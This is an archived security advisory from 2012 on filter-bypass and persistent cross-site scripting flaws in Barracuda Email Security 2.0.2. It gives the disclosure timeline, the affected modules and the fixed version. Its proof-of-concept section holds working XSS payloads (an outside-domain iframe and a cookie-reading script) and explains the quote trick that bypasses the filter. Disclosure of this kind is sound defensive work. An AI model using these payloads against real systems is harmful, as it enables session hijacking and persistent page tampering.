exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Barracuda EMail Security 2.0.2 Filter Bypass / XSS

Barracuda EMail Security 2.0.2 Filter Bypass / XSS
Posted Aug 2, 2012
Authored by Benjamin Kunz Mejri, Vulnerability Laboratory | Site vulnerability-lab.com

Barracuda EMail Security version 2.0.2 suffers from filter bypass and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | b0a797fb7dfcc66b871111abd692bfda9228961189021ce78aaaded974a9d21e

Barracuda EMail Security 2.0.2 Filter Bypass / XSS

Change Mirror Download
Title:
======
Barracuda EMail Security 2.0.2 - Multiple Web Vulnerabilities


Date:
=====
2012-08-01


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=621
http://www.vulnerability-lab.com/get_content.php?id=630

Barracuda Networks Security ID: BNSEC-304


VL-ID:
=====
621


Common Vulnerability Scoring System:
====================================
4.1


Introduction:
=============
The Barracuda Email Security Service is a comprehensive and affordable cloud-based email security service that protects
both inbound and outbound email against the latest spam, viruses, worms, phishing and denial of service attacks. Barracuda
Email Security Service also includes email encryption and Data Loss Prevention features.

The Barracuda Email Security Service leverages advanced security technologies from the industry-leading Barracuda Spam & Virus
Firewall and features rich multiple cloud-based protection:

Rate control and Denial of Service (DoS) protection
Reputation-based blocking from known spam and malware sources
Anti-virus, featuring the patent-pending Barracuda Anti-Virus Supercomputing Grid
Anti-phishing, using the Barracuda Anti-Fraud Intelligence
Protection against spam, phishing, fraud and emails with other malicious intent
Custom sender/recipient policy

Comprehensive Protection
Spam and viruses are blocked in the cloud prior to delivery to the customer, saving network bandwidth and providing additional
Denial of Service protection. In addition to network bandwidth savings, cloud-based filtering offloads any processing required
for spam and virus filtering from the email server. By leveraging the compute capacity available in the cloud, patent-pending
Barracuda Anti-Virus Supercomputing Grid not only detects new outbreaks similar to known viruses, it also identifies new threats
for which signatures have never existed.

(Copy of the Vendor Homepage: https://www.barracudanetworks.com/ns/products/bess_overview.php )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered an input filter bypass & 2 persistent web vulnerabilities in Barracudas EMail Security Application UI v2.0.2.


Report-Timeline:
================
2012-06-20: Researcher Notification & Coordination
2012-06-23: Vendor Notification
2012-07-01: Vendor Response/Feedback
2012-07-24: Vendor Fix/Patch
2012-08-01: Public or Non-Public Disclosure


Status:
========
Published


Affected Products:
==================
Barracuda Networks
Product: EMail Security Appliance Application vUI 2.0.2 & older versions


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
A filter bypass vulnerability & 2 persistent input validation vulnerabilities are detected in Barracudas EMail Security Application UI v2.0.2.
The vulnerability allows an attacker (remote) to bypass the input validation & exception handling to inject or display own malicious
persistent context on application side (persistent). The vulnerabilities are located in the Domain Settings > Directory Services > LDAP Host
module with the vulnerable bound name parameter. The secound persistent vulnerability is located in the reports module with the bound
vulnerable parameters start date & end date. Exploitation requires low user inter action & privileged application user account. Successful
exploitation of the vulnerability can lead to session hijacking (admin) or stable (persistent) context manipulation.

Vulnerable Module(s):
[+] Domain Settings > Directory Services > LDAP Host (/domains/info/4)
[+] Reports (../reports)

Vulnerale Parameter(s):
[+] LDAP Host > NAME
[+] Reports > Date Start & Date End


Proof of Concept:
=================
1.1
The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
For demonstration or reproduce ...

Review: Domain Settings > Directory Services > LDAP Host

<div id="directory-services" class="module">
<h4 class="module-title">Directory Services</h4>
<div class="module-content">
<div class="warn notice" id="ldap-test-result" style=""><img src="/images/spinner1.gif"
alt="loading..."> Connecting to >"<iframe src="http://global-evolution.info">@gmail.com >"<script>alert(document.cookie)</script><div style="1@gmail.com 0</iframe></div>
<div style="float: right;">
<a href="https://ess.barracudanetworks.com/domains/sync_ldap/4" class="btn"><span><span>Synchronize Now</span></span></a>
<a href="#" class="btn" id="ldap-test-btn"><span><span>Test Settings</span></span></a>
</div>
<p class="field">
<label class="label" for="ldap_host">LDAP Host:</label>
<input name="ldap_host" id="ldap_host" size="30" value=">
"<iframe src=http://global-evolution.info>@gmail.com >"<script>alert(document.cookie)</script><
div style="1@gmail.com 0" type="text">

URL: https://ess.127.0.0.1:1338/domains/info/4

PoC: >">"<iframe src=http://global-evolution.info>VL >"<div style="1 >">"

Note:
To bypass the validation close the tag of the exception handling on beginning with double quotes 2 times.
The mask of the exception (>") will be bypassed and the string will be executed out of the secure exception handling message.



1.2
The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
For demonstration or reproduce ...

Vulnerable Module: Reports > Date Start > Date End

PoC: >"<iframe src=http://global-evolution.info>

URL: https://ess.127.0.0.1:1338/reports

Note:
1. Include a start Date & End Date
2. Inject after the start date & end date your own persistent script code
3. Result: The script code get executed out of the date listing application context
4. Save value with script code to events for exploitation via module.


Solution:
=========
BESS version 2.0.4, release July 24th, 2012 [Barracuda Networks] (Customer Area)


Risk:
=====
The security risk of the persistent input validation vulnerabilities are estimated as medium(+).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory



--
VULNERABILITY RESEARCH LABORATORY
LABORATORY ADMINISTRATION
CONTACT: admin@vulnerability-lab.com

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close